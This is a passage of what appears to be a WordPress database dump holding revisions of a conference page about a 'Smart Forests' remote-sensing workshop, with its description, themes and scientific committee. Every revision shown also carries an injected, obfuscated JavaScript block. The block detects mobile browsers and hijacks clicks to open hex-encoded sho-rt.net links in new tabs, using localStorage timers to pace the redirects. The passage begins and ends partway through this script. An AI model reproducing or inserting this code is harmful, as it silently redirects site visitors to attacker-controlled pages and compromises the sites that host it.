)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-08 19:49:16','2022-11-08 19:49:16','',3049,'https://gsw2023.com/?p=3057',0,'revision','',0),
(3058,1,'2022-11-08 19:50:30','2022-11-08 19:50:30','<p>[vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\n<h5><strong>This workshop is jointly organized by</strong></h5>\n<ul>\n<li>\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\n</li>\n<li>\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\n</li>\n<li>\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\n</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2></h2>\n<h2>CO-CHAIRS</h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"58\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-08 19:50:30','2022-11-08 19:50:30','',3049,'https://gsw2023.com/?p=3058',0,'revision','',0),
(3059,1,'2022-11-08 19:51:16','2022-11-08 19:51:16','<p>[vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\n<h5><strong>This workshop is jointly organized by</strong></h5>\n<ul>\n<li>\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\n</li>\n<li>\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\n</li>\n<li>\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\n</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2></h2>\n<h2>CO-CHAIRS</h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"58\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the event:</u></strong></h5>\n<ul>\n<li><strong>Advancements in novel sensors, platforms, data generation, and data fusion</strong></li>\n<li><strong>Automation and real-time system operations</strong></li>\n<li><strong>Innovation in robotic operation of sensors, platforms, and AI powered processing technologies</strong></li>\n<li><strong>Machine and deep learning approaches for forest mensuration, reconstruction, and attribute estimation</strong></li>\n<li><strong>New knowledge and understanding about forest functioning processes</strong></li>\n<li><strong>Benchmarking as a mechanism to determine the potential and limitations of remote sensing systems and methods</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee: </u></strong></h5>\n<ul>\n<li><strong>Xinlian Liang, Wuhan University, China</strong></li>\n<li><strong>Yunsheng Wang, Finnish Geospatial Research Institute, Finland</strong></li>\n<li><strong>Francesco Pirotti, <a href=\"https://scholar.google.fi/citations?view_op=view_org&amp;hl=en&amp;org=17347040822771261636\">University of Padova</a>, Italy</strong></li>\n<li><strong>Joanne C. White, Canadian Forest Service, Canada</strong></li>\n<li><strong>Fabian Faßnacht, Freie Universität Berlin, Germany</strong></li>\n<li><strong>Maria Teresa Melis, University of Cagliari, Italy</strong></li>\n<li><strong>Weishu Gong, University of Maryland, College Park, USA</strong></li>\n<li><strong>Megumi Yamashita, Tokyo University of Agriculture and Technology, Japan</strong></li>\n<li><strong>Jaime Hernandez, University of Chile, Chile</strong></li>\n<li><strong>Martin Mokroš, Czech University of Life Sciences Prague, Czech Republic</strong></li>\n<li><strong>Mariana Campos, Finnish Geospatial Research Institute, Finland</strong></li>\n<li><strong>Roberto Pierdicca, Polytechnic University of Marche, Italy</strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( 